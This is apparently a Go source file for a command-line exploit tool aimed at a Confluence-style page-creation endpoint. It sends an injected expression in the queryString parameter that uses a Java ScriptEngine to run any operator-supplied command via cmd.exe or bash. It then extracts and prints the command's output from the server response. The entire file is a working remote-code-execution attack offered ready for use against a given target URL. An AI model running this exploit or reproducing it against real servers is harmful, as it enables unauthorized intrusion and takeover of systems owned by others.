main.go

package main

import (
	"flag"
	"fmt"
	"io/ioutil"
	"net/http"
	"net/url"
	"os"
	"strings"
	"math/rand"
	"time"

	"github.com/fatih/color"
)

func exploit(targetURL string, path string, injectionParam string, command string) {
	// 构造完整的目标 URL
	fullURL := targetURL + path

	// 构造注入 payload
	startTag := generateRandomString(8)
	endTag := generateRandomString(8)
	payload := fmt.Sprintf("%s\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022%s\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027%s", startTag, command, endTag)

	// 构造 POST 请求的参数
	params := url.Values{
		injectionParam: {payload},
	}

	// 发送 POST 请求
	resp, err := http.PostForm(fullURL, params)
	if err != nil {
		color.Red("[-] An error occurred:", err)
		os.Exit(1)
	}
	defer resp.Body.Close()

	// 读取响应内容
	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		color.Red("[-] Failed to read response:", err)
		os.Exit(1)
	}

	// 检查响应中是否包含随机字符串的起始和结束标记
	if strings.Contains(string(body), startTag) && strings.Contains(string(body), endTag) {
		color.Green("[+] Vulnerability detected")
		// 提取指定标记之间的值
		value := extractValue(string(body), startTag + "[", "\n]" + endTag)

		// 打印值
		color.Blue("[*] Extracted value:")
		fmt.Println(value)
	} else {
		color.Red("[-] No vulnerability detected")
	}
}

func extractValue(content, startTag, endTag string) string {
	startIndex := strings.Index(content, startTag)
	if startIndex == -1 {
		color.Red("[-] Failed to find start tag")
		os.Exit(1)
	}

	startIndex += len(startTag)
	endIndex := strings.Index(content[startIndex:], endTag)
	if endIndex == -1 {
		color.Red("[-] Failed to find end tag")
		os.Exit(1)
	}

	return content[startIndex : startIndex+endIndex]
}

func generateRandomString(length int) string {
	rand.Seed(time.Now().UnixNano())
	charset := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
	var result strings.Builder
	for i := 0; i < length; i++ {
		randomIndex := rand.Intn(len(charset))
		randomChar := charset[randomIndex]
		result.WriteByte(randomChar)
	}
	return result.String()
}

func main() {
	// 解析命令行参数
	command := flag.String("c", "", "Command to execute")
	path := flag.String("p", "/pages/createpage-entervariables.action?SpaceKey=x", "URL path")
	targetURL := flag.String("u", "", "Target URL")
	flag.Parse()

	// 检查必需的参数
	if *command == "" || *targetURL == "" {
		color.Blue("[*] Please provide the target URL (-u) and command to execute (-c)")
		os.Exit(1)
	}

	// 执行命令注入
	exploit(*targetURL, *path, "queryString", *command)
}